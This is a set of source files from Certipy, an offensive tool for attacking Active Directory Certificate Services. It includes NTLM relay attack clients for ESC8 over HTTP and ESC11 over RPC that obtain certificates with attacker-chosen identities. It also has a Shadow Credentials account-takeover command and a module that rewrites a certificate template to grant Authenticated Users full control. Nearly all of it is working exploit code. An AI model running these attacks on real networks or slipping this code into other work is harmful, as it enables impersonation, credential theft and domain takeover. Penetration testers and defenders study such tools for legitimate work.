                "Would you like to save the private key? (y/N) "
            ).rstrip("\n")

            if should_save.lower() == "y":
                with open("%d.key" % request_id, "wb") as f:
                    f.write(key_to_pem(key))

                logging.info("Saved private key to %d.key" % request_id)

            return self.finish_run()

        if len(request_id) == 0:
            logging.error("Failed to get request id from response")
            return

        request_id = int(request_id[0])

        self.client.request("GET", "/certsrv/certnew.cer?ReqID=%d" % request_id)
        response = self.client.getresponse()

        content = response.read()
        cert = pem_to_cert(content)

        return self.save_certificate(cert, key=key, request_id=request_id)

    def finish_run(self):
        self.adcs_relay.attacked_targets.append(self.client.user)
        if not self.adcs_relay.forever:
            self.adcs_relay.shutdown()

    def save_certificate(
        self,
        cert: x509.Certificate,
        key: rsa.RSAPrivateKey = None,
        request_id: int = None,
    ):
        identifications = get_identifications_from_certificate(cert)

        print_certificate_identifications(identifications)

        object_sid = get_object_sid_from_certificate(cert)
        if object_sid is not None:
            logging.info("Certificate object SID is %s" % repr(object_sid))
        else:
            logging.info("Certificate has no object SID")

        out = self.adcs_relay.out
        if out is None:
            out, _ = cert_id_to_parts(identifications)
            if out is None:
                out = str(request_id)

            out = out.rstrip("$").lower()

        if key is None:
            try:
                with open("%d.key" % request_id, "rb") as f:
                    key = pem_to_key(f.read())
            except Exception as e:
                logging.warning(
                    "Could not find matching private key. Saving certificate as PEM"
                )
                with open("%s.crt" % out, "wb") as f:
                    f.write(cert_to_pem(cert))

                logging.info("Saved certificate to %s" % repr("%s.crt" % out))
            else:
                logging.info("Loaded private key from %s" % repr("%d.key" % request_id))
                pfx = create_pfx(key, cert)
                with open("%s.pfx" % out, "wb") as f:
                    f.write(pfx)
                logging.info(
                    "Saved certificate and private key to %s" % repr("%s.pfx" % out)
                )
        else:
            pfx = create_pfx(key, cert)

            with open("%s.pfx" % out, "wb") as f:
                f.write(pfx)

                logging.info(
                    "Saved certificate and private key to %s" % repr("%s.pfx" % out)
                )

        self.finish_run()


class ADCSRPCAttackClient(ProtocolAttack):
    def __init__(self, config, dce, username):
        super().__init__(config, dce, username)

        self.dce = dce
        self.rpctransport = dce.get_rpc_transport()
        self.stringbinding = self.rpctransport.get_stringbinding()

        try:
            if "/" in username:
                self.domain, self.username = username.split("/")
            else:
                self.domain, self.username = "Unknown", username
        except Exception as e:
            print("Got error", e)

    def run(self):
        self.adcs_relay.attack_lock.acquire()

        self.interface = RPCRequestInterface(parent=self.adcs_relay)
        self.interface._dce = self.dce

        try:
            self._run()
        except Exception as e:
            logging.error("Got error: %s" % e)
            if self.adcs_relay.verbose:
                traceback.print_exc()
            else:
                logging.error("Use -debug to print a stacktrace")
        finally:
            self.adcs_relay.attack_lock.release()

    def _run(self):
        if (
            not self.adcs_relay.no_skip
            and (self.username + "@" + self.domain) in self.adcs_relay.attacked_targets
        ):
            logging.info(
                "Skipping user %s since attack was already performed"
                % repr(self.username + "@" + self.domain)
            )
            return

        logging.info("Attacking user %s" % repr(self.username + "@" + self.domain))

        request_id = self.adcs_relay.request_id
        if request_id:
            self.retrieve()
        else:
            self.request()

        self.finish_run()

    def retrieve(self) -> bool:
        request_id = int(self.adcs_relay.request_id)

        logging.info("Retrieving certificate for request id %d" % request_id)

        cert = self.interface.retrieve(request_id)
        if cert is False:
            logging.error("Failed to retrieve certificate")
            return False

        identifications = get_identifications_from_certificate(cert)

        print_certificate_identifications(identifications)

        object_sid = get_object_sid_from_certificate(cert)
        if object_sid is not None:
            logging.info("Certificate object SID is %s" % repr(object_sid))
        else:
            logging.info("Certificate has no object SID")

        out = self.adcs_relay.out
        if out is None:
            out, _ = cert_id_to_parts(identifications)
            if out is None:
                out = self.username

            out = out.rstrip("$").lower()

        try:
            with open("%d.key" % request_id, "rb") as f:
                key = pem_to_key(f.read())
        except Exception as e:
            logging.warning(
                "Could not find matching private key. Saving certificate as PEM"
            )
            with open("%s.crt" % out, "wb") as f:
                f.write(cert_to_pem(cert))

            logging.info("Saved certificate to %s" % repr("%s.crt" % out))
        else:
            logging.info("Loaded private key from %s" % repr("%d.key" % request_id))
            pfx = create_pfx(key, cert)
            with open("%s.pfx" % out, "wb") as f:
                f.write(pfx)
            logging.info(
                "Saved certificate and private key to %s" % repr("%s.pfx" % out)
            )

        return True

    def request(self) -> bool:
        template = self.config.template

        if template is None:
            logging.info("Template was not defined. Defaulting to Machine/User")
            template = "Machine" if self.username.endswith("$") else "User"

        logging.info(
            "Requesting certificate for user %s with template %s"
            % (repr(self.username), repr(template))
        )

        csr, key = create_csr(
            self.username,
            alt_dns=self.adcs_relay.dns,
            alt_upn=self.adcs_relay.upn,
            key_size=self.adcs_relay.key_size,
        )
        self.key = key
        self.adcs_relay.key = key

        csr = csr_to_der(csr)

        attributes = ["CertificateTemplate:%s" % template]

        if self.adcs_relay.upn is not None or self.adcs_relay.dns is not None:
            san = []
            if self.adcs_relay.dns:
                san.append("dns=%s" % self.adcs_relay.dns)
            if self.adcs_relay.upn:
                san.append("upn=%s" % self.adcs_relay.upn)

            attributes.append("SAN:%s" % "&".join(san))

        cert = self.interface.request(csr, attributes)

        if cert is False:
            logging.error("Failed to request certificate")
            return False

        identifications = get_identifications_from_certificate(cert)

        print_certificate_identifications(identifications)

        object_sid = get_object_sid_from_certificate(cert)
        if object_sid is not None:
            logging.info("Certificate object SID is %s" % repr(object_sid))
        else:
            logging.info("Certificate has no object SID")

        out = self.adcs_relay.out
        if out is None:
            out, _ = cert_id_to_parts(identifications)
            if out is None:
                out = self.username

            out = out.rstrip("$").lower()

        pfx = create_pfx(key, cert)

        outfile = "%s.pfx" % out

        with open(outfile, "wb") as f:
            f.write(pfx)

        logging.info("Saved certificate and private key to %s" % repr(outfile))

        return pfx, outfile

    def finish_run(self):
        self.adcs_relay.attacked_targets.append(self.username + "@" + self.domain)
        if not self.adcs_relay.forever:
            self.adcs_relay.shutdown()


class Relay:
    def __init__(
        self,
        target,
        ca=None,
        template=None,
        upn=None,
        dns=None,
        sid=None,
        retrieve=None,
        key_size: int = 2048,
        out=None,
        interface="0.0.0.0",
        port=445,
        forever=False,
        no_skip=False,
        timeout=5,
        debug=False,
        **kwargs
    ):
        self.target = target
        self.ca = ca
        self.template = template
        self.upn = upn
        self.dns = dns
        self.sid = sid
        self.request_id = int(retrieve)
        self.key_size = key_size
        self.out = out
        self.forever = forever
        self.no_skip = no_skip
        self.timeout = timeout
        self.verbose = debug
        self.interface = interface
        self.port = port
        self.kwargs = kwargs

        self.attacked_targets = []
        self.attack_lock = Lock()

        if self.target.startswith("rpc://"):
            if ca is None:
                logging.error("A certificate authority is required for RPC attacks")
                exit(1)

            logging.info("Targeting %s (ESC11)" % target)
        else:
            if not self.target.startswith("http://"):
                self.target = "http://%s" % self.target
            if not self.target.endswith("/certsrv/certfnsh.asp"):
                if not self.target.endswith("/"):
                    self.target += "/"
                self.target += "certsrv/certfnsh.asp"
            logging.info("Targeting %s (ESC8)" % self.target)

        target = TargetsProcessor(
            singleTarget=self.target, protocolClients={"HTTP": self.get_relay_http_server, "RPC": self.get_relay_rpc_server}
        )

        config = NTLMRelayxConfig()
        config.setTargets(target)
        config.setIsADCSAttack(True)
        config.setADCSOptions(self.template)
        config.setAttacks(
            {"HTTP": self.get_attack_http_client, "RPC": self.get_attack_rpc_client}
        )
        config.setProtocolClients(
            {"HTTP": self.get_relay_http_server, "RPC": self.get_relay_rpc_server}
        )
        config.setListeningPort(port)
        config.setInterfaceIp(interface)
        config.setSMB2Support(True)
        config.setMode("RELAY")

        self.server = SMBRelayServer(config)

    def start(self):
        logging.info("Listening on %s:%d" % (self.interface, self.port))

        self.server.start()

        try:
            while True:
                time.sleep(0.1)
        except KeyboardInterrupt:
            print("")
            self.shutdown()
        except Exception as e:
            logging.error("Got error: %s" % e)
            if self.verbose:
                traceback.print_exc()
            else:
                logging.error("Use -debug to print a stacktrace")

    def get_relay_http_server(self, *args, **kwargs) -> ADCSHTTPRelayServer:
        relay_server = ADCSHTTPRelayServer(*args, **kwargs)
        relay_server.adcs_relay = self
        return relay_server

    def get_attack_http_client(self, *args, **kwargs) -> ADCSHTTPAttackClient:
        attack_client = ADCSHTTPAttackClient(*args, **kwargs)
        attack_client.adcs_relay = self
        return attack_client

    def get_relay_rpc_server(self, *args, **kwargs) -> ADCSRPCRelayServer:
        relay_server = ADCSRPCRelayServer(*args, **kwargs)
        relay_server.adcs_relay = self
        return relay_server

    def get_attack_rpc_client(self, *args, **kwargs) -> ADCSRPCAttackClient:
        attack_client = ADCSRPCAttackClient(*args, **kwargs)
        attack_client.adcs_relay = self
        return attack_client

    def shutdown(self):
        logging.info("Exiting...")
        os._exit(0)


def entry(options: argparse.Namespace) -> None:
    relay = Relay(**vars(options))
    relay.start()



NAME = "shadow"

import argparse
from typing import Callable, Tuple

from . import target


def entry(options: argparse.Namespace):
    from certipy.commands import shadow

    shadow.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(
        NAME, help="Abuse Shadow Credentials for account takeover"
    )

    subparser.add_argument(
        "shadow_action",
        choices=["list", "add", "remove", "clear", "info", "auto"],
        help="Key Credentials action",
    )
    subparser.add_argument(
        "-account",
        action="store",
        metavar="target account",
        help="Account to target. If omitted, the user "
        "specified in the target will be used",
    )
    subparser.add_argument(
        "-device-id",
        action="store",
        help="Device ID of the Key Credential Link",
    )
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    group = subparser.add_argument_group("output options")
    group.add_argument("-out", action="store", metavar="output file name")

    group = subparser.add_argument_group("connection options")
    group.add_argument(
        "-scheme",
        action="store",
        metavar="ldap scheme",
        choices=["ldap", "ldaps"],
        default="ldaps",
    )

    target.add_argument_group(subparser, connection_options=group)

    return NAME, entry



import argparse
import collections
import json
from itertools import groupby
from typing import Dict

import ldap3
from ldap3.protocol.microsoft import security_descriptor_control

from certipy.lib.ldap import LDAPConnection, LDAPEntry
from certipy.lib.logger import logging
from certipy.lib.target import Target

PROTECTED_ATTRIBUTES = [
    "objectClass",
    "cn",
    "distinguishedName",
    "whenCreated",
    "whenChanged",
    "name",
    "objectGUID",
    "objectCategory",
    "dSCorePropagationData",
    "msPKI-Cert-Template-OID",
    "uSNCreated",
    "uSNChanged",
    "displayName",
    "instanceType",
    "revision",
    "msPKI-Template-Schema-Version",
    "msPKI-Template-Minor-Revision",
]

# SubCA template configuration with full control for 'Authenticated Users' with zeroed flags
CONFIGURATION_TEMPLATE = {
    "showInAdvancedViewOnly": [b"TRUE"],
    "nTSecurityDescriptor": [
        b"\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00"  # Authenticated Users - Full Control
    ],
    "flags": [b"0"],
    "pKIDefaultKeySpec": [b"2"],
    "pKIKeyUsage": [b"\x86\x00"],
    "pKIMaxIssuingDepth": [b"-1"],
    "pKICriticalExtensions": [b"2.5.29.19", b"2.5.29.15"],
    "pKIExpirationPeriod": [b"\x00@\x1e\xa4\xe8e\xfa\xff"],
    "pKIOverlapPeriod": [b"\x00\x80\xa6\n\xff\xde\xff\xff"],
    "pKIDefaultCSPs": [b"1,Microsoft Enhanced Cryptographic Provider v1.0"],
    "msPKI-RA-Signature": [b"0"],
    "msPKI-Enrollment-Flag": [b"0"],
    "msPKI-Private-Key-Flag": [b"16842768"],
    "msPKI-Certificate-Name-Flag": [b"1"],
    "msPKI-Minimal-Key-Size": [b"2048"],
}


class Template:
    def __init__(
        self,
        target: "Target",
        template: str = None,
        configuration: str = None,
        save_old: bool = False,
        scheme: str = "ldaps",
        connection: LDAPConnection = None,
        **kwargs,
    ):
        self.target = target
        self.template_name = template
        self.configuration = configuration
        self.save_old = save_old
        self.scheme = scheme
        self.kwargs = kwargs

        self._connection = connection

    @property
    def connection(self) -> LDAPConnection:
        if self._connection is not None:
            return self._connection

        self._connection = LDAPConnection(self.target, self.scheme)
        self._connection.connect()

        return self._connection

    def configuration_to_json(self, configuration: dict) -> str:
        output = {}
        for key, value in configuration.items():
            if key in PROTECTED_ATTRIBUTES:
                continue

            if type(value) == list:
                output[key] = list(map(lambda x: x.hex(), value))
            else:
                output[key] = value.hex()

        return json.dumps(output)

    def get_configuration(self, template) -> LDAPEntry:
        results = self.connection.search(
            "(&(cn=%s)(objectClass=pKICertificateTemplate))" % template,
            search_base=self.connection.configuration_path,
            query_sd=True,
        )

        if len(results) == 0:
            results = self.connection.search(
                "(&(displayName=%s)(objectClass=pKICertificateTemplate))" % template,
                search_base=self.connection.configuration_path,
                query_sd=True,
            )

            if len(results) == 0:
                logging.error(
                    "Could not find any certificate template for %s" % repr(template)
                )
                return None

        if len(results) > 1:
            # This should never happen, but just in case
            logging.error(
                "Found multiple certificate templates identified by %s" % repr(template)
            )
            return None

        template = results[0]

        return template

    def json_to_configuration(self, configuration_json: str) -> Dict:
        output = {}
        for key, value in configuration_json.items():
            if key in PROTECTED_ATTRIBUTES:
                continue

            if type(value) == list:
                output[key] = list(map(lambda x: bytes.fromhex(x), value))
            else:
                output[key] = bytes.fromhex(value)

        return output

    def load_configuration(self, configuration: str) -> Dict:
        with open(configuration, "r") as f:
            configuration_json = json.load(f)

        return self.json_to_configuration(configuration_json)

    def set_configuration(self) -> bool:
        if self.template_name is None:
            logging.error("A template (-template) is required")
            return False

        if self.configuration is not None:
            new_configuration = self.load_configuration(self.configuration)
        else:
            new_configuration = CONFIGURATION_TEMPLATE

        old_configuration = self.get_configuration(self.template_name)
        if old_configuration is None:
            return False

        if self.save_old:
            old_configuration_json = self.configuration_to_json(
                old_configuration["raw_attributes"]
            )

            out_file = "%s.json" % old_configuration.get("cn")
            with open(out_file, "w") as f:
                f.write(old_configuration_json)

            logging.info(
                "Saved old configuration for %s to %s"
                % (repr(self.template_name), repr(out_file))
            )

        changes = {}
        for key in old_configuration["raw_attributes"].keys():
            if key in PROTECTED_ATTRIBUTES:
                continue

            if key not in new_configuration:
                changes[key] = [
                    (
                        ldap3.MODIFY_DELETE,
                        [],
                    )
                ]
                pass

            if key in new_configuration:
                old_values = old_configuration.get_raw(key)
                new_values = new_configuration[key]
                if collections.Counter(old_values) == collections.Counter(new_values):
                    continue

                changes[key] = [
                    (
                        ldap3.MODIFY_REPLACE,
                        new_configuration[key],
                    )
                ]
        for key, value in new_configuration.items():
            if (
                key in changes
                or key in PROTECTED_ATTRIBUTES
                or key in old_configuration["raw_attributes"]
            ):
                continue

            changes[key] = [
                (
                    ldap3.MODIFY_ADD,
                    value,
                )
            ]

        if len(changes.keys()) == 0:
            logging.warning(
                "New configuration is the same as old configuration. Not updating"
            )
            return False

        logging.info(
            "Updating certificate template %s" % repr(old_configuration.get("cn"))
        )

        by_op = lambda item: item[1][0][0]
        for op, group in groupby(sorted(changes.items(), key=by_op), by_op):
            logging.debug("%s:" % op)
            for item in list(group):
                key = item[0]
                value = item[1][0][1]
                logging.debug("    %s: %s" % (key, repr(value)))

        result = self.connection.modify(
            old_configuration.get("distinguishedName"),
            changes,
            controls=security_descriptor_control(sdflags=0x4),
        )

        if result["result"] == 0:
            logging.info("Successfully updated %s" % repr(old_configuration.get("cn")))
            return True
        elif result["result"] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
            logging.error(
                "User %s doesn't have permission to update these attributes on %s"
                % (repr(self.target.username), repr(old_configuration.get("cn")))
            )
        else:
            logging.error("Got error: %s" % result["message"])


def entry(options: argparse.Namespace) -> None:
    target = Target.from_options(options, dc_as_target=True)
    del options.target

    template = Template(target=target, **vars(options))
    template.set_configuration()



from typing import Callable, List, Tuple

from certipy.lib.logger import logging


def to_pascal_case(snake_str: str) -> str:
    components = snake_str.split("_")
    return "".join(x.title() for x in components)


def pretty_print(
    d: dict, indent: int = 0, padding: int = 40, print: Callable = print
) -> None:
    if isinstance(d, dict):
        for key, value in d.items():
            if isinstance(value, str) or isinstance(value, int):
                print(("  " * indent + str(key)).ljust(padding, " ") + ": %s" % value)
            elif isinstance(value, dict):
                print("  " * indent + str(key))
                pretty_print(value, indent=indent + 1, print=print)
            elif isinstance(value, list):
                if len(value) > 0 and isinstance(value[0], dict):
                    print("  " * indent + str(key))
                    for v in value:
                        pretty_print(v, indent=indent + 1, print=print)
                else:
                    print(
                        ("  " * indent + str(key)).ljust(padding, " ")
                        + ": %s"
                        % (
                            ("\n" + " " * padding + "  ").join(
                                map(lambda x: str(x), value)
                            )
                        )
                    )
            elif isinstance(value, tuple):
                print("  " * indent + str(key))
                for v in value:
                    pretty_print(v, indent=indent + 1, print=print)
            elif value is None:
                continue
            else:
                # Shouldn't end up here
                raise NotImplementedError("Not implemented: %s" % type(value))
    else:
        # Shouldn't end up here
        raise NotImplementedError("Not implemented: %s" % type(d))


def print_certificate_identifications(identifications: List[Tuple[str, str]]):
    if len(identifications) > 1:
        logging.info("Got certificate with multiple identifications")
        for id_type, id_value in identifications:
            print("    %s: %s" % (id_type, repr(id_value)))
    elif len(identifications) == 1:
        logging.info(
            "Got certificate with %s %s"
            % (identifications[0][0], repr(identifications[0][1]))
        )
    else:
        logging.info("Got certificate without identification")



from setuptools import setup

with open("README.md") as f:
    readme = f.read()

setup(
    name="certipy-ad",
    version="4.7.0",
    license="MIT",
    author="ly4k",
    url="https://github.com/ly4k/Certipy",
    long_description=readme,
    long_description_content_type="text/markdown",
    install_requires=[
        "asn1crypto",
        "cryptography>=39.0",
        "impacket",
        "ldap3",
        "pyasn1==0.4.8",
        "dnspython",
        "dsinternals",
        "pyopenssl>=23.0.0",
        "requests",
        "requests_ntlm",
        'winacl; platform_system=="Windows"',
        'wmi; platform_system=="Windows"',
        "pycryptodome",
        "unicrypto"
    ],
    packages=[
        "certipy",
        "certipy.commands",
        "certipy.commands.parsers",
        "certipy.lib",
        "certipy.lib.sspi",
    ],
    entry_points={
        "console_scripts": ["certipy=certipy.entry:main"],
    },
    description="Active Directory Certificate Services enumeration and abuse",
)
